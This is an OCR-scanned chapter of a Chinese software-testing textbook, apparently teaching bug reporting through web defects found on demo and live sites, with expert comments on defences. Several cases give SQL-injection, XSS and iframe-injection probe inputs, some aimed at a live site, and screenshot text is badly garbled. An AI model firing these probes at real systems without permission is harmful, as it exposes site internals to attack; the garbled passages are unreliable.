图 像 格式 即 图 像 文件 存放 的 格式 ,通常 有 JPEG、TIFF、RAW、BMP、GIF、PNG 等。 

在 测试 图 片上 传 和 浏览 时 ,一 定 要 能 区 分 文件 类 型 格式 。 不 应 该 出 现 视频 、 音 频 、 病 毒 
等 文件 都 能 通过 图 片 浏览 上 传 至 服务 器 运行 。 

如 果 图 片上 传 至 服务 器 ,还 要 控制 图 片 的 大 小 ,以 免 服 务 器 被 大 量 的 图 片 攻 陷 ,导致 网 
站 无 法 打开 、 服 务 器 容量 不 足 等 问题 。 


4.3 KPI: oricity 网 站 修改 密码 可 违反 约束 


缺陷 标题 oricity 网 站 注册 账户 后 ,修改 密码 可 违反 约束 。 
测试 平台 与 浏览 器 ”Windows XP 十 Firefox。 
测试 步骤 
(1) 打开 oricity 网 站 http://www. oricity. com, 
(2) 单 击 “ 登 录 ” 链 接 。 
(3) 登录 已 注册 账户 , 单 击 *X XxX 的 城市 空间 ”。 
(4) 展开 “我 的 账户 ”, 选 择 密码 修改 。 
(5) 在 原 密码 处 输入 原始 密码 ,在 新 密码 处 输入 违反 密码 约束 (约束 为 密码 必须 大 于 
6 个 字符 ) 的 密码 ,如 123、0000、 十 一 x*/。 
(6) 观察 密码 修改 情况 ,如 被 修改 就 使 用 新 密码 登录 。 
期 望 结果 ”显示 与 新 密码 长 度 相关 的 出 错 提示 ,修改 失败 。 
实际 结果 ”修改 成 功 , 使 用 新 密码 可 成 功 登录 ,如 图 4-4 和 图 4-5 所 示 。 





D MaU wer Bec "Ep IAD Wu 


mos -E 
PE EE CE 月 二 但 
nta kem HA C oso tact niso NER q 
un gaa SERETA EE 
we Ea p 
2 wet - 
“unna [a3 
reed m ess 此 处 输入 123 
Bum mezzren. smun 
men Li 
rm 
Gr) 
s| 
O u= AROA won, RR BERGER ENS DAP EN. Er 




















图 4-4 用 已 修改 密码 123 重新 登录 


实验 4 ”软件 技术 测试 训练 AZ 


























图 4-5 用 已 修改 的 短 密码 登录 成 功 





DS 专家 点 评 


参见 4. 1 节 实验 #1 的 专家 点 评 。 


4.4 实验 #4: oricity 网 站 URL 算 改 暴露 代码 细节 


缺陷 标题 oricity 网 站 话题 详情 页 更 改 URL 后 ,暴露 代码 细节 。 
测试 平台 与 浏览 器 ”Windows 7 十 Chrome。 
测试 步骤 
(1) 打开 oricity 网 站 http://www. oricity. com, 
(2) 打开 任 一 话题 。 
(3) 修改 URL. fE eventId 后 面 添 加 “;”, 单 击 “ 转 到 ”。 
期 望 结果 ”提示 URL 错误 。 
实际 结果 ”直接 显示 数据 库 错误 ,如 图 4-6 所 示 o 


DS 专家 点 评 


SQL 注入 攻击 不 仅 可 以 针对 可 以 填充 的 文本 框 进行 攻击 ,而 且 可 以 通过 直接 复 改 
URL 的 参数 值 进行 攻击 。 

本 例 中 的 URL 篡改 相对 简单 ,只 是 把 eventId 对 应 的 参数 值 改 成 分 号 ,但 导致 的 结果 
是 引发 的 错误 提示 信息 暴露 了 代码 细节 。 从 出 错 提示 可 以 明显 看 出 ,数据 库 采 用 的 是 
MySQL Server, 出 错 的 表 是 oc_reply, 对 应 的 字段 有 replytype,eventid, replycount 等 。 一 
旦 攻击 者 能 拿 到 这 些 细 节 信 息 , 就 能 进行 更 深层 次 的 攻击 。 
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Query Error: select * from oc reply where replytype-'3' and eventid- and 
replycount-1 


The URL Is: 
http://www.oricity.com/fl/fw.php?eventId96EF96BC969B-72164134&hostId-3 


MySQL Server Error: 

You have an error in your SQL syntax; check the manual that corresponds to your 
MySQL server version for the right syntax to use near 'and replycount-1' at line 1 
( 1064 ) 


You Can Get Help In: 
http:/ /www.phpwind.net 





图 4-6 自 改 参数 导致 数据 库 错 误 





对 于 SQL 注入 攻击 ,软件 开发 人 员 常 见 的 防范 方法 如 下 。 

(1) 严格 检查 用 户 输入 ,注意 特殊 字符 *””“;”*[”*--”“xp_”。 

(2) 数字 型 的 输入 必须 是 合法 的 数字 。 

(3) 字符 型 的 输入 中 对 ?进行 特殊 处 理 。 

(4) 验证 所 有 的 输入 点 ,包括 Get, Post, Cookie 以 及 其 他 HTTP X, 
(5) 使 用 参数 化 的 查询 。 

(6) 使 用 SQL 存储 过 程 。 

(7) 最 小 化 SQL 权限 。 


4.5 KHS: testphp 网 站 非法 电话 号 码 注册 成 功 


缺陷 标题 testphp 网 站 使 用 非法 电话 号 码 可 成 功 注册 。 
测试 平台 与 浏览 器 Windows 7 十 IE 8 或 Chrome, 
测试 步骤 
(1) 打开 testphp 网 站 http://testphp. vulnweb. com/。 
(2) 单 击 Sign up, 进 入 注册 页 面 。 
G) 输入 非法 电话 号 码 11111ffhhshh8221, 如 图 4-7 所 示 。 
(4) 单 击 signup 按钮 。 
期 望 结果 ”提示 电话 号 码 为 非法 电话 号 码 。 
实际 结果 ”注册 成 功 ,如 图 4-8 所 示 。 








F signup 


x 


实验 4 ”软件 技术 测 





€ > Ç D testphp.vulnweb.com/signup.php 








search art 

















9o 
Browse categories 
Browse artists 
Your cart 

Signup 

Your profile 

Our guestbook 
AJAX Demo 





Links. 
Security art 
Fractal Explorer 


f'acunetix ETE 


home | categories | artists | disclaimer | your cart | guestbook | AJAX Demo 


Signup new user 
Please do not enter real information here. 


If you press the submit button you will be transferred to asecured connection. 


Uemme —— Bamh | 


Password Fee | 
Rape mos pem] 
Name === 
Credit card number: [123323131 | 
E-Mail Bec | 


Meere mpm | | 


Address: 





About Us | Privacy Policy | Contact Us 





IA edd new user 


图 4-7 输入 非法 电话 号 码 








€ > Ç [testphp.vulnweb.com/secured/newuser.php 





ACUNETIX ART 





xS 专家 点 评 


You have been introduced to our database with the above informations: 


* Username: dragoniu 
= Password: asd123 

= Name: lu 

* Address 

= E-Mail aQc 

» Phone number. 11111fmhshh8221 
* Credit card: 12332111 





Now you can login from here. 











4-8 非法 电话 号 码 注册 成 功 


试 训练 








固定 电话 号 码 ( 这 里 特 指 中 国 固定 电话 用 户 ,包括 区 号 和 电话 号 码 , 忽 略 分 机 号 ) 由 区 号 
和 电话 号 码 组 成 。 电 话 号 码 是 电话 管理 部 门 为 电话 机 设 定 的 号 码 , 由 7 一 8 位 数字 组 成 。 区 
号 是 指 世界 各 大 城市 所 属 行政 区 域 常 用 电话 区 划 号 码 , 这 些 号 码 主要 用 于 国内 、 国 际 长 途 电 
话 的 接 入 。 在 中 国内 地 拨打 国内 长 途 电话 时 ,要 先 拨 长 途 冠 码 0 号 。 中 国内 地 的 区 号 有 
2 一 4 位 ,增加 字 冠 0(0 不 是 区 号 ) 就 是 3~5 位 区 号 。 其 中 ,3 位 区 号 可 以 视 为 特殊 情况 。 
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测试 国内 固定 电话 号 码 应 注意 以 下 几 点 。 

1. 有效 等 价 类 

(1) 7 位 数字 。 

(2) 8 位 数字 。 

2. 无 效 等 价 类 

(1) 位 数 少 于 7 位 和 多 于 8 位 。 

(2) 全 角 数 字 。 

(3) 号 码 包含 非 数字 (中 英文 /大 小 写字 符 、 特 殊 字符 )。 

OD 号 码 包 含 空格 (前 /中 /后 、 中 英文 /全 半角 空格 )。 

本 例 中 虽然 是 国外 的 网 站 ,但 是 国外 的 电话 号 码 也 是 数字 ,不 支持 英文 字母 。 

如 果 程 序 员 对 用 户 输入 的 电话 号 码 不 做 合法 性 校 验 , 就 容易 导致 数据 库 注 入 、XSS 攻 
击 、 网 页 结构 被 破坏 、 网 站 被 框架 等 一 系列 意 想 不 到 的 结果 。 


4.6 ”实验 #6: testfire 网 站 非法 邮箱 提交 成 功 


缺陷 标题 testfire 网 站 AltoroMutual 出 现 不 合法 邮箱 可 以 返回 成 功 的 错误 。 
测试 平台 与 浏览 器 Windows 7 十 Google 或 Firefox. 
测试 步骤 

(1) 打开 testfire 网 站 http://demo. testfire. net, 

(2) 单 击 Win an 64GB iPad Air 链接 ,如 图 4-9 Bros 。 





*X D Altoro Mutual 
& > Q D demo.tstfire.net 


AltoroMutual > 











Online Banking with FREE P S Privacy and Security 

The 2000 employees of Altoro 
No stamps, envelopes, or checks. Mutual are dedicated to protecting 
to write give you more time to EE Your privacy and security. We 
spend on the things you enjoy. b pledge to provide you with the 


Mutuals pramier resi astata Retirement solutions [zn | 
lenders help with financing. Asa Retaining good employees is a c wit 
regional leader, we know the tough task. See how Altoro Mutual — enter you in a draw for 1 of 50 
market, we understand the. can assist you in accomplishing ipad Airs. We look forward to 


4-9 Hi; Win an 64GB iPad Air 链接 


实验 4 ”软件 技术 测试 训练 NA 


(3) 回答 新 页 面 的 相应 问题 ,如 图 4-10 所 示 。 


D Akoro Mutuak Survey x W 
€ > Q [D demo.testfire.net/survey questions.aspx 








Sign In | Contact Us | feedback | Search| — — ^ — 





AltoroMutual 2 


Welcome 


1f you complete this survey, you have an opportunity to win an iPod. Would you like to continue? 





图 4-10 单 击 Yes 填写 表单 
(4) 在 邮箱 输入 框 内 输入 @. abc, 单 击 Submit 按钮 ,如 图 4-11 所 示 。 


Ey D Aktoro Mutuak Survey C x YO 
e> e [n | demo.testfire net/survey complete.aspx 


AltoroMutual > 








六 


Thank you for completing our survey. We are always working to improve our statusin the eyes of 
our most important dient: YOU. Please enter your email below and we will notify you soon as to 
your winning status. Thanks. 


[e oem 


Thanks 





图 4-11 输入 错误 的 邮箱 地 址 


期 望 结果 ”系统 应 该 提示 E-mail 地 址 无 效 。 
实际 结果 ”系统 提示 会 尽快 联系 该 E-mail 地 址 ,如 图 4-12 所 示 。 


xS eran 


在 网 络 中 ,电子 邮箱 可 以 自动 接收 网 络 任何 电子 邮箱 所 发 的 电子 邮件 ,并 能 存储 规定 大 
小 的 多 种 格式 的 电子 文件 。 电 子 邮 箱 具 有 单独 的 网 络 域名 ,其 电子 邮箱 地 址 在 @ 后 标注 。 
一 个 完整 的 电子 邮件 地 址 格式 为 : 登录 名 @ 主 机 名 .域名 。 其 中 ,域名 由 几 部 分 组 成 ,每 一 
部 分 称 为 一 个 子 域 (subdomain) ,各 子 域 之 间 用 “.” 隔 开 , 每 个 子 域 都 会 告诉 用 户 一 些 有 关 
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PERIE D Aktoro Mutual Survey € x Y T 
€ > Q |D demo.testfire.net/survey_complete.aspx?txtEmail=%40.abc 























hanks 


Thanks for your entry. We will contact you shortly at: 





4-12 非法 邮箱 提交 成 功 


这 台 邮 件 服务 器 的 信息 。 

电子 邮箱 输入 框 常见 验证 测试 如 下 。 

(1) 不 输入 任何 字符 (非法 邮箱 ) 。 

(2) 仅 输入 中 文 或 英文 空格 (非法 邮箱 ) 。 

G) 字符 串 中 没有 @ 和 点 ,例如 abcd123com( 非 法 邮箱 ) 。 

(4) 字符 串 中 没有 @ 或 没有 点 ,例如 abcd@163com( 非 法 邮箱 )。 

(5) 字符 串 中 出 现 多 于 一 个 @ ,例如 abc@bcd@sina. com( 非 法 邮箱 )。 

(6) 第 一 个 字符 串 是 @ ,#| 38 (9163. com( 非 法 邮箱 ) 。 

(7) @ 和 点 之 间 没 有 字符 ,例如 abcd@. com (非法 邮箱 ) 。 

(8) 正确 的 电子 邮箱 格式 为 XXX@XXX.XXX。 

如 果 程 序 员 对 用 户 输入 的 电子 邮箱 地 址 不 做 合法 性 校 验 ,就 容易 导致 数 据 库 注入 、XSS 
攻击 、 网 页 结构 被 破坏 、 网 站 被 框架 等 一 系列 意 想不到 的 结果 。 


4.7 KET: oricity 网 站 新 增 好 友 页 面 有 XSS 攻击 风险 


缺陷 标题 个 人 空间 一 好 友 分 组 一 新 增 好 友 页 面 组 名 输入 框 有 KSS 攻击 风险 。 
测试 平台 与 浏览 器 Windows 8. 1+IE 11 或 Chrome, 
测试 步骤 

(1) 打开 oricity 网 站 http://www. oricity. com, 

(2) 单 击 “ 登 录 ” 按 钮 ,用 已 注册 的 账户 cc1103 登录 页 面 。 

G) 单 击 “[cc1103] 的 城市 空间 ”, 转 到 个 人 中 心 页 面 。 

(4) 单 击 “ 我 的 朋友 ”一 “好 友 分 组 ”。 

(5) 单 击 “ 新 增 组 ”, 在 组 名 框 输入 KSS 攻击 代码 < script > alert('hhhh') </script >, 

如 图 4-13 所 示 , 单 击 “ 确 认 ” 按 钮 。 


实验 4 ”软件 技术 测试 训练 











© www.oricity.com/user/friendgroup. php 








































[ == 
ES 








存在 XSS 攻 击 风险 





ama sm. 











图 4-13 组 名 框 输入 XSS 攻击 代码 


HAAR “脚本 不 响应 ,新 增 分 组 失败 。 
实际 结果 ”存在 KSS 风险 并 且 新 增 分 组 成 功 ,如 图 4-14 所 示 。 


X ` @ www.oricity.com/user/friendgroup.php. 







w° 


x jamna nemo per 














图 4-14 存在 XSS 风险 且 新 增 分 组 成 功 


DS 专家 点 评 


如 果 程 序 员 对 用 户 输 入 的 组 名 不 做 合法 性 校 验 ,就 容易 导致 数据 库 注入 、XSS 攻击 、 网 
页 结构 被 破坏 、 网 站 被 框架 等 一 系列 意 想 不 到 的 结果 。 

如 果 程 序 员 对 从 数据 库 中 取得 的 数据 不 做 适当 的 编码 ,直接 输出 到 网 页 中 显示 ,也 会 出 
现 各 种 意 想 不 到 的 结果 ,可 能 导致 XSS 攻击 、 网 页 结构 被 破坏 、 网 站 被 框架 等 。 

所 以 ,输入 有 效 性 验证 和 输出 使 用 适当 的 编码 是 程序 员 需 要 考虑 的 事 ,这 也 是 一 个 系统 
是 否 健壮 的 衡量 指标 。 

在 本 例 中 ,程序 员 没 有 进行 输入 有 效 性 检查 ,输出 时 也 没有 进行 适当 的 编码 输出 ,因此 
导致 XSS x+, 


4.8 KHS: oricity 网 站 新 增 好 友 页 面 有 框架 钓鱼 风险 


缺陷 标题 oricity 网 站 一 个 人 空间 一 好 友 分 组 一 新 增 好 友 页 面 组 名 输入 框 有 框架 钓鱼 
风险 。 
测试 平台 与 浏览 器 Windows 8. 1 十 IE 11 或 Chrome, 
测试 步骤 
(1) 打开 oricity 网 站 http://www. oricity. com。 
(2) 单 击 “ 登 录 ” 按 钮 .用 已 注册 的 账号 cc1103 登录 页 面 。 
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(3) 单 击 “[ccl103] 的 城市 空间 ”, 转 到 个 人 中 心 页 面 。 
(4) 单 击 “ 我 的 朋友 ”一 “好 友 分 组 ”。 
(5) 单 击 “ 新 增 组 ”, 在 组 名 输入 框 中 输入 < iframe sre— http: / / baidu. com ></ iframe >, 
备注 正常 输入 。 
(6) 单 击 “确认 ”按钮 ,观察 页 面 元 素 。 
期 望 结果 不 存在 框架 钓鱼 风险 。 
实际 结果 ”存在 框架 钓鱼 风险 ,如 图 4-15 所 示 。 





D wwworiclty com/ user /trendoroup php. *65gott*Z225h5 


stn Ben rna pam TAS ETRE emas To LER 














图 4-15 组 名 输入 框 存在 框架 钓鱼 风险 


DS 专家 点 评 


参见 4.7 节 实 验 #7 的 专家 点 评 。 
本 例 是 程序 员 没有 做 输入 有 效 性 检查 ,同时 输出 时 也 没 做 适当 的 编码 输出 ,导致 框架 钓 
鱼 风 险 。 


4.9 5s Z9; testfire 网 页 结构 能 被 破坏 


缺陷 标题 testfire 网 站 出 现 登 录 失 败 后 页 面 文字 显示 异常 的 错误 。 
测试 平台 与 浏览 器 Windows 7 十 Google 或 Firefox, 
测试 步骤 
(1) 打开 testfire 网 站 http://demo. testfire. net; 
(2) 单 击 Sign In。 
(3) fE Username 输入 框 中 输入 < script > alert("TEST")</script >, 在 Password 输 
入 框 中 输入 任意 字符 ,如 图 4-16 所 示 , 单 击 Login 按钮 。 
期 望 结果 ”出 现 提示 登录 失败 的 正常 页 面 。 
实际 结果 ”网 页 结构 被 破坏 ,Username 输入 框 后 出 现 其 他 字符 ,如 图 4-17 所 示 。 


xS 专家 点 评 


参见 4.7 节 实 验 #7 的 专家 点 评 。 
本 例 是 程序 员 没 有 做 输入 有 效 性 检查 ,输出 时 也 没 做 适当 的 编码 输出 ,导致 网 页 结构 被 
破坏 ,部 分 源 代码 展示 出 来 。 


实验 4 ”软件 技术 测试 训练 


[5 Akoro Mutua Online £ x 


€ > C [D demo:estfirenet/bank/loginaspx — 


AltoroMutual 2 
TY 


Sign In | Contact Us | Feedback | Search 








Online Banking Login 


Username: <script>alert( TEST )</ 
= T 


Login 











Online Banking Login 


Login Failed: We're sorry, but this username was not found in our 
system. Please try again. 


Usemame: — [cscript»alert( F style="width: 150px;"> 


Password: 


LLagin | 








图 4-17 网 页 结构 被 破坏 


4.10 实验 # 10: crackme 网 站 出 生日 期 不 合约 束 


缺陷 标题 crackme 网 站 的 注册 页 面 存在 注册 账户 的 日 期 违反 约束 的 问题 。 
测试 平台 与 浏览 器 Windows 7+ Google 或 Firefox。 
测试 步骤 
(1) 打开 crackme 网 站 http://crackme. cenzic. com。 
(2) 单 击 左 边 导航 条 中 的 Register, 进 入 注册 页 面 ,URL 为 http://crackme. cenzic. 
com/Kelev/register/register. php. 
(3) f£ Birth Date 输入 框 中 输入 非 yyyy-mm-dd 格式 的 日 期 ,如 fdvesfvfvfvsafvs, 在 
E-mail 输入 框 中 不 输入 信息 ,其 他 输入 框 输入 任意 非 空 值 ,如 图 4-18 所 示 , 单 击 
GO 按钮 。 
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New User Registration (Kindly Enter AH Inputs Correctly) 


(Do m ope rium] In consideration of your 
~ Last Name : EEEE use of the Service, you. 
represent that you are of 
-useno:EE | legal age to form a binding 
contract and are not a 
* Pesewoni : [c7 person barred from 
B receiving services under 
the laws of the United 


* Birth Date : [zaveszvzezvsarvs States or other applicable 
(format: yyyy-mm-dd) jurisdiction. 





























国 pay your regular 
monthly bills 
(telephone, 
electricity, mobile 
phone, insurance 
etc.) right here 
from your desktop. 
Have a look 
































图 4-18 用 非法 的 出 生日 期 注册 


期 望 结果 ”页面 提示 输入 日 期 格式 错误 。 
实际 结果 页面 没有 提示 输入 日 期 格式 错误 ,没有 提示 E-mail 选项 为 空 的 错误 ,并 且 
显示 注册 成 功 ,如 图 4-19 所 示 。 


C) New User Registration x 





An asterix ( * ) indicates a required field. 





* First Name : 
(po not use nicknames) 1n consideration of your 
“LastName: | use of the Service, you 
—————— represent that you are of 
* User : legal age to form a binding 
contract and are not a 

















"Password: [ — | person barred from 
— receiving services under 
the laws of the United 
* Birth Date : [ —— States or other applicable 
jurisdiction. 


(format: yyyy-mm-dd) 











图 4-19 非法 出 生日 期 注册 成 功 


xS 专家 点 评 


对 于 出 生日 期 的 测试 用 例如 下 。 
(1) 年 yyyy 的 范围 不 在 1900 与 当前 年 之 间 。 
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(2) 月 mm 的 范围 不 在 1 一 12。 

(3) 日 dd 的 范围 不 在 1 一 31。 

(OD 日 期 部 分 输入 汉字 、 字 母 、 字符。 

(5) 日 期 部 分 和 时 间 部 分 的 格式 不 合法 。 

(6) 考虑 年 月 对 日 的 限制 ,比如 2 月 31 日 是 不 存在 的 。 
(7) 用 正确 的 日 期 输入 ,看 正常 功能 能 否 工作 。 


如 果 程 序 员 对 用 户 输入 的 日 期 不 做 合法 性 校 验 ,就 容易 导致 数据 库 注 入 、XSS 攻击 、 网 


页 结构 被 破坏 、 网 站 被 框架 等 一 系列 意 想 不 到 的 结果 。 


4.11 XU E 11: zero 网 站 表单 域 验证 有 问题 


缺陷 标题 zero 网 站 Feedback 表单 中 所 有 的 输入 域 都 存在 验证 问题 。 
测试 平台 与 浏览 器 Windows XP 十 IE 8。 
测试 步骤 

(1) 进入 http://zero. webappsecurity. com/ 网 站 。 

(2) 单 击 FEEDBACK 链接 。 


(3) 在 Feedback 表单 的 所 有 域 都 输入 一 个 空格 , 单 击 Send Message 按钮 ,如 图 4-20 


所 示 ,观察 页 面 的 响应 。 


x^» Wo su 
"mA 
Bi w 











Zero Bank EX 
Feedback 


ea va hei you wih many of your 


所 有 表单 域 都 


输入 一 个 空格 








图 4-20 在 Feedback 表单 的 所 有 域 都 输入 一 个 空格 
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HAAR ”发 送 失 败 ,出现 相应 的 错误 提示 信息 。 
实际 结果 发送 成 功 ,如 图 4-21 所 示 。 

















PEET 


Zero Bank 5" EE F 











Feedback 





返回 成 功 页 面 








图 4-21 空白 提交 成 功 


DO 专家 点 评 


参见 4.7 节 实 验 #7 的 专家 点 评 。 
本 例 是 程序 员 没 有 做 输入 有 效 性 检查 ,输出 时 也 没 做 适当 的 编码 输出 ,导致 空白 数据 也 
能 提交 成 功 ,数据 库 中 增加 许多 垃圾 记录 。 


4.12 ”实验 #12: crackme 网 站 E-mail 验证 问题 


缺陷 标题 crackme 网 站 中 Feedback 发 送 用 户 反 馈 , 不 合法 E-mail 地 址 用 户 反馈 发 送 
成 功 。 
测试 平台 与 浏览 器 Windows 7 十 Firefox 40。 
测试 步骤 
(1) 进入 crackme 网 站 http: //crackme. cenzic. com/kelev/view/home. php. 
(2) 单 击 导航 条 中 的 Feedback 链接 。 
(3) fE E-mail 域 输入 test # qq. com, 其 他 域 输入 有 效 信息 ,如 图 4-22 所 示 , 单 击 GO 
按钮 。 
HAAR 发送 失败 ,提示 E-mail 地 址 错误 。 
实际 结果 “用户 反馈 发 送 成 功 , 如 图 4-23 所 示 。 


FX I | 

参见 4.6 节 实验 #6 的 专家 点 评 。 

本 例 是 非法 的 E-mail 能 提交 成 功 , 这 样 会 到 后 台 去 发 E-mail。 一 般 后 台 的 E-mail 设计 
都 是 如 果 邮 件 没 发 送 成 功 会 继续 尝试 发 送 ,直到 成 功 为 止 ,这 样 可 能 导致 邮箱 服务 器 崩溃 ， 
正常 的 邮件 无 法 发 送 。 
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图 4-22 Feedback 中 填 人 相应 信息 


> 
Ai —— 




















图 4-23 发送 成 功 


4.13 实验 #13:“ 言 若 金 叶 ?公众 号 "与 你 共 舞 ”模块 中 的 
问题 


缺陷 标题 点 击 查看 “与 你 共 舞 "模块 中 的 选项 ,弹出 重复 的 内 容 。 
测试 手机 与 版 本 号 苹果 5 十 9. 3. 3。 
测试 步骤 
CD 进入 “ 言 车 金 叶 ”公众 号 ,分 别 点 击 “ 与 你 共 舞 ”中 的 选项 。 
(2) 查看 弹出 的 内 容 。 
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期 望 结 果 ”每 个 选项 弹出 不 一 样 的 内 容 。 
实际 结果 有 3 个 选项 弹出 相同 的 内 容 , 如 图 4-24 所 示 。 





使 用 攻略 -绝招 大 放送 


阅读 全 文 


言 若 金 叶 公众 号 -使 用 攻略 - 绝 
招 大 放送 
5 月 3 日 联系 我 们 


高 校 教师 区 





使 用 攻略 -绝招 大 放送 
E 言 若 金 叶 我 心 飞扬 与 你 共 舞 











图 4-24 点 击 不 同 选项 出 现 相同 的 内 容 


E waw 


参见 3. 18 3 XX £18 的 专家 点 评 。 


4.14 实验 #14: testaspnet 网 站 同一 账户 可 以 重复 注册 


缺陷 标题 testaspnet 网 站 acunetix acublog 注册 模块 存在 可 以 重复 注册 同一 个 账户 
的 错误 。 
测试 平台 与 浏览 器 Windows 7 十 Chrome 或 Firefox。 
测试 步骤 
(1) 打开 testaspnet 网 站 http: //testaspnet. vulnweb. com, 
(2) 在 导航 条 中 单 击 signup. Œ Username 输入 框 中 输入 Jammy, fE Password 输入 
框 中 输入 000000 , 单 击 Sign me up 按钮 ,观察 页 面 ,如 图 4-25 所 示 。 
(3) 再 次 在 导航 条 中 单 击 signup. fE Username 输入 框 中 输入 Jammy, 在 Password 
输入 框 中 输入 000000, 单 击 Sign me up, 观 察 页 面 ,如 图 4-26 所 示 。 
期 望 结果 ”页 面 提示 该 账户 已 存在 。 
实际 结果 ”页面 没 有 提示 账户 已 存在 ,提示 注册 成 功 ,同样 的 信息 再 次 注册 。 
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图 4-25 初次 注册 的 用 户 名 和 密码 


所 ,图 testaspnetvulnwebcomjsignupaspx  8& ~ C | 图 -SeE-cwrPp A EB f$ 9- > 
L RAM L hadoop L 网 页 保存 _ flex L php ,J MABE L UI L andriod _ SEZ _ thinkphp |. 特效 网 页 





























LLLI 


Subscription successfull. Please visit the login page to login. 


上 次 注册 成 功 的 提示 








图 4-26 提示 注册 成 功 


D 专家 点 评 


同样 的 账户 信息 再 次 注册 时 ,需要 提示 此 账户 已 成 功 创建 ,可 直接 登录 。 如 果 用 同样 的 
信息 再 次 注册 ,会 造成 数据 库 的 数据 重复 ,同样 的 信息 占据 了 不 同 的 空间 ,浪费 数据 库 的 空 
间 。 所 有 注册 信息 都 应 该 去 除 重 复 。 

网 站 在 注册 用 户 时 需要 检测 用 户 名 是 否 已 存在 。 通 常 在 显示 是 否 存在 用 户 名 时 有 两 种 
做 法 。 
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一 种 做 法 是 通过 回 发 页 面 的 方式 ,把 页 面 的 信息 发 回 服务 器 检查 ,然后 再 回 发 给 浏览 
器 。 这 种 做 法 速度 慢 ,而 且 屏 幕 闪 烁 ,网 页 要 刷新 ,用 户 体验 不 好 。 

另 一 种 做 法 是 通过 AJAX 技术 ,不 刷新 页 面 ,而 是 通过 浏览 器 的 异步 回 发 机 制 将 信息 
从 浏览 器 发 到 服务 器 ,服务 器 将 处 理 后 的 数据 返回 浏览 器 。 这 种 做 法 的 好 处 是 速度 快 ,数据 
传输 量 少 ,用 户 体验 跟 桌 面 程 序 一 样 。 


4.15 实验 #15: oricity 网 站 上 传 中 文 图 像 名 问题 


缺陷 标题 oricity 网 站 上 传 轨迹 时 将 不 符合 命名 规则 的 图 片上 传 成 功 。 
测试 平台 与 浏览 器 Windows 7 十 Firefox。 
测试 步骤 

(1) 打开 oricity 网 站 http://www. oricity. com/ , 

(2) 登录 已 注册 的 账号 。 

G) 单 击 页 面 上 方 的 “户外 轨迹 ”, 然 后 选择 上 传 轨迹 。 

(4) 填写 信息 后 ,选择 名 为 “标志 . jpg” 的 图 片上 传 ,如 图 4-27 所 示 。 


@ rr orit comre edb ee fe ph 1791 EOI m on ?»$6*2*-P""ti10D-«4-E 
| sem hedoop MENU iden php .AR UC dod MEZ _ ok MAT. RUN 8 ones 





L. 
WAP 要 求 以 英文 命名 文件 
— PHI (————€ 


Lisaa) (s a) 

















图 4-27 选择 图 片 文件 名 包括 中 文 名 与 要 求 不 符合 


期 望 结果 ”提示 文件 命名 不 正确 。 
实际 结果 ”显示 上 传 成 功 ,如 图 4-28 所 示 ; 但 图 片 无 法 显示 ,如 图 4-29 所 示 。 


DS 专家 点 评 
此 经 典 Bug 出 现 的 原因 是 : 文件 格式 要 求 注 明 " 不 支持 非 英文 文件 名 ”, 上 传 以 中 文 命 
名 的 文件 时 ,应 该 提示 "不 支持 非 英文 文件 名 ”, 实 际 却 上 传 成 功 , 但 图 片 却 显示 不 出 来 。 
目前 国内 有 不 少 网 站 服务 器 用 的 是 国外 的 服务 器 ,对 中 文 及 其 他 非 英文 编码 支持 不 足 。 
如 果 不 支持 解析 中 文 文件 名 ,就 应 该 在 文件 上 传 时 做 限制 ,而 不 是 上 传 成 功 后 不 能 正确 
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上 传 成 功 ， 与 要 求 条 件 不 符 


Comm e 2008-2013 Acton Group M vis resin 
Ed "crgo 








图 4-28 ”提示 图 片上 传 成 功 
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429 图 片 无 法 显示 


4.16 实验 #16: qa 网 站 特殊 字符 搜索 出 现 404 错误 


缺陷 标题 ” 诺 顾 软 件 测试 团 队 主 页 特殊 字符 搜索 出 现 404 错误 。 
测试 平台 与 浏览 器 Windows 7 或 Kali Linux 十 Firefox。 
测试 步骤 
CD 打开 诺 质 软件 测试 团队 主页 http://qa. roqisoft. com, 
(2) 在 主页 的 搜索 框 中 输入 特殊 字符 ://。 
G) 单 击 提交 。 
期 望 结果 ”显示 或 提示 相应 的 搜索 结果 。 
实际 结果 ”出 现 404 错误 ,结果 参见 图 3-2。 
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N. 专家 点 评 


如 果 不 允 许 特殊 字符 ,那么 在 用 户 输 入 特殊 字符 进行 测试 的 时 候 , 程 序 应 该 提示 用 户 输 
入 非法 ,而 不 是 返回 404 找 不 到 网 页 错误 。 


4.17 实验 #17: oricity 网 站 用 户 注销 后 还 能 邀请 好 友 


缺陷 标题 登录 oricity 网 站 后 在 个 人 的 城市 空间 注销 ,注销 后 还 可 以 访问 “邀请 好 友 ” 





页 面 。 
测试 平台 与 浏览 器 Windows 7+ Chrome 3X Firefox 3X IE 11。 
测试 步骤 


(1) 打开 oricity 网 站 http://www. oricity. com/. 
(2) 单 击 “登录 "按钮 ,输入 正确 的 账户 (如 yanxingliD 登 录 。 
(3) 登录 成 功 , 单 击 页 面 顶部 的 [yanxingl 让 的 城市 空间 ”到 “我 的 城市 空间 ”页 面 。 
(4) 在 这 个 页 面 单 击 “ 注 销 ” 按 钮 。 
(5) 注销 后 , 单 击 这 里 每 个 左 侧 菜单 。 
期 望 结果 ”都 无 法 再 访问 , 跳 转 到 登录 页 面 。 
实际 结果 “邀请 好 友 ” 界 面 还 可 以 打开 ,并 且 可 以 输入 信息 ,如 图 4-30 所 示 。 


€ > Q (D wwworidtycom/user/invitefriend.php?oc- 1 Hons 





PDSA LES IAME wama ISEE IFAN MER | 




















图 4-30 “邀请 好 友 ” 权 限 控制 不 正确 


D$ 专家 点 评 f 


注销 后 的 用 户 是 不 能 访问 账户 中 心 相关 页 面 的 。 在 图 4-31 左 侧 菜单 中 ,其 他 页 面 都 不 
能 直接 访问 ,但 “邀请 好 友 ” 页 面 可 以 访问 ,程序 员 对 邀请 好 友 的 页 面 权 限 控制 不 完全 。 
这 个 问题 也 可 以 看 成 Web 安全 。 本 页 面 权限 控制 的 技术 实现 有 问题 。 
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对 于 只 有 登录 才能 访问 的 页 面 , 测 试 工 程 师 一 定 要 尝试 退出 登录 后 ,直接 访问 这 些 页 面 
的 链接 ,看 看 能 否 自动 跳 转 到 登录 页 面 ,如 果 不 能 跳 转 到 登录 页 面 ,就 是 权限 设置 错误 。 


4.18 XIR #18: testaspnet 网 站 RSS 链接 Error 403 


缺陷 标题 testaspnet 网 站 在 TE 浏览 器 单 击 RSS 中 链接 出 现 HTTP Error 403 错误 。 
测试 平台 与 浏览 器 Windows 7 十 IE 11. 
测试 步骤 
(1) 打开 testaspnet 网 站 http://testaspnet. vulnweb. com, 
(2) 单 击 红色 按钮 RSS. 
